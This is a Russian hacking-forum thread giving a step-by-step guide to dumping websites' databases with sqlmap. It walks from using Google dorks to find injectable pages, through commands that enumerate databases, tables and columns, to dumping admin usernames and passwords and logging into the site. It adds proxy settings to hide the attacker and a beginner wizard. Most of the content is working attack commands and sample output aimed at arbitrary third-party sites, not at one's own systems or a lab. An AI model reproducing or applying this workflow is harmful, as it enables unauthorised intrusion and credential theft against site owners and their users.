Этот сайт поддерживается рекламными объявлениями на нем, пожалуйста, отключите AdBlock, чтобы мы могли продолжать предоставлять вам качественный контент, который вы ожидаете.
Загрузка...

Информация Гайд по дампу (сливу) баз через SQLmap

Тема в разделе "Статьи и мануалы хакера", создана пользователем SmsKa, 16 июн 2016.

  1. SmsKa

    SmsKa Вылетает BSOD после перепоя,нужен патч)))

    Сообщения:
    1.028
    Симпатии:
    1.459
    Движок для определения SQL-уязвимостей — пускай и самая важная, но все-таки не единственная часть функционала sqlmap. В кратце покажу работу сканера в действии.
    Скачать программы можно с этой темы
    Зарегистрируйтесь или чтоб увидеть содержимое Спойлера!
    Итак начнем. Дабы установить программу вначале необходимо скачать и установить интерпретатор python после устанавливаем сам sqlmap для удобства в ту же папку.

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    Далее создаете на рабочем столе ярлык sqlmap и прописываем в поле обьект: %windir%\system32\cmd.exe
    рабочая папка: C:\Python27

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    Затем запускаете ярлык.И прописываем: python sqlmap/sqlmap.py -help
    Должен появиться список команд.

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    SQLMAP GUI

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.


    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.

     
    Последнее редактирование: 16 июн 2016
  2. SmsKa

    SmsKa Вылетает BSOD после перепоя,нужен патч)))

    Сообщения:
    1.028
    Симпатии:
    1.459
    sqlmap - GET метод

    Для начала нам нужна дорка, как только нашли дорку открываем sqlmap и пишем

    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2"
    sqlmap будет обнаруживать уязвимость вашей дорки и скажет вам какой тип уязвимости и тип базы данных, если цель уязвима переходим к следующему шагу.

    Находим database name
    Через эту команду находим имя базы данных
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
    Тут sqlmap найдет database name нашей цели, к примеру "web_db"


    Находим tables name
    После того как sqlmap нашел имя базы данных,ищем tables name.
    Через эту команду находим название таблиц
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --tables
    Это покажет таблици в "web_db" базе данных , к примеру "tbl_admin"


    Находим columns name
    Находим что внутри "tbl_admin" от "web_db" и это будут наши columns. Через эту команду находим columns type
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
    Это покажет нам список названий столбцов, к примеру "user" и "password"


    Дамп/dump
    Эта команда сдампит все что есть в столбцах
    Код:
    sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C user,password --dump
    И тут мы находим "user = admin" и "password = adminpass".
    Идем на сайт и заходим


    Так же можно и так: (2 вариант)

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --technique=BEU
    sqlmap.py - это запуск самой программы
    -u - цель
    --random-agent - это скульмап берет произвольный user-agent из своей базы
    --thread 10 это количество одновременных потоков минимум 1 максимум 10
    --technique=BEU - техника эксплуатации Blind,Union,Error

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --current-user --current-db --privileges
    --current-user - пользователь БД
    --current-db - база с которой работаем

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --dbs
    проверям к каким базам данных у нас есть доступ

    покажет так:
    available databases [2]:[*] имя[*] имя
    (может быть одна или больше баз)

    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --count -D имя
    Сейчас скульмап даст таблицы в базе данных "имя" и сколько записей в каждой таблице
    к примеру:
    Database: имя
    +-------------+---------+
    | Table | Entries |
    +-------------+---------+
    | ASIGNALOGO | 420 |
    | NOTAS | 411 |
    | FOTOS | 342 |
    | POBLACIONES | 28 |
    | LOGOS | 7 |
    +-------------+---------+
    теперь можно посмотреть колонки в интересующей нас таблице
    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --columns -T LOGOS -D имя
    Database: имя
    Table: LOGOS
    [4 columns]
    +-------------+--------------+
    | Column | Type |
    +-------------+--------------+
    | CODIGO | int(5) |
    | DESCRIPCION | varchar(200) |
    | FICHERO | varchar(40) |
    | NOMBRE | varchar(120) |
    +-------------+--------------+
    либо можно во всех таблицах
    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --columns -D имя
    Теперь дампим нужную таблицу
    Код:
    sqlmap.py -u "дорка" --random-agent --thread 10 --dump -T LOGOS -D имя
    дамп таблиц будет лежать в папке dump того сайта с которым мы работаем, он будет в формате .CSV открывать можно OFFICE'ом или текстовым редактором
     
    Последнее редактирование: 16 июн 2016
  3. SmsKa

    SmsKa Вылетает BSOD после перепоя,нужен патч)))

    Сообщения:
    1.028
    Симпатии:
    1.459
    Немного дополню: вы можете использовать прокси при использовании данной программы для этого необходимо дописывать параметр:

    --proxy=

    Пожалуйста Войдите или Зарегестрируйтесь чтобы видеть ссылки.

    , где 255.255.255.255:8080 это наша прокся, а http:// тип прокси.

    В качестве типа прокси может также выступать socks4/5. В таком случае наш параметр будет выглядеть следующим образом:

    Код:
    --proxy=socks5://255.255.255.255:8080
    , где 255.255.255.255:8080 это наша прокся, а socks5// тип прокси.

    Пример использования:
    Код:
    sqlmap.py -u http://www.target.com/index.php?id=2 --proxy=http://51.227.119.128:3128
    И так далее во всех операциях:
    Код:
    sqlmap.py -u http://www.target.com/index.php?id=2 --proxy=http://51.227.119.128:3128 --dbs
    
    Код:
    sqlmap.py -u http://www.target.com/index.php?id=2 --proxy=http://51.227.119.128:3128 -D web_db --tables
    
    Для новичков можно использовать --wizard он облегчит вам работу.
    Значит так:
    Код:
    sqlmap.py --wizard
    
    дальше следуем по инструкции нажимаем циферки 1 или 2
     
    Последнее редактирование: 16 июн 2016
    МаРиК нравится это.

Поделиться
Загрузка...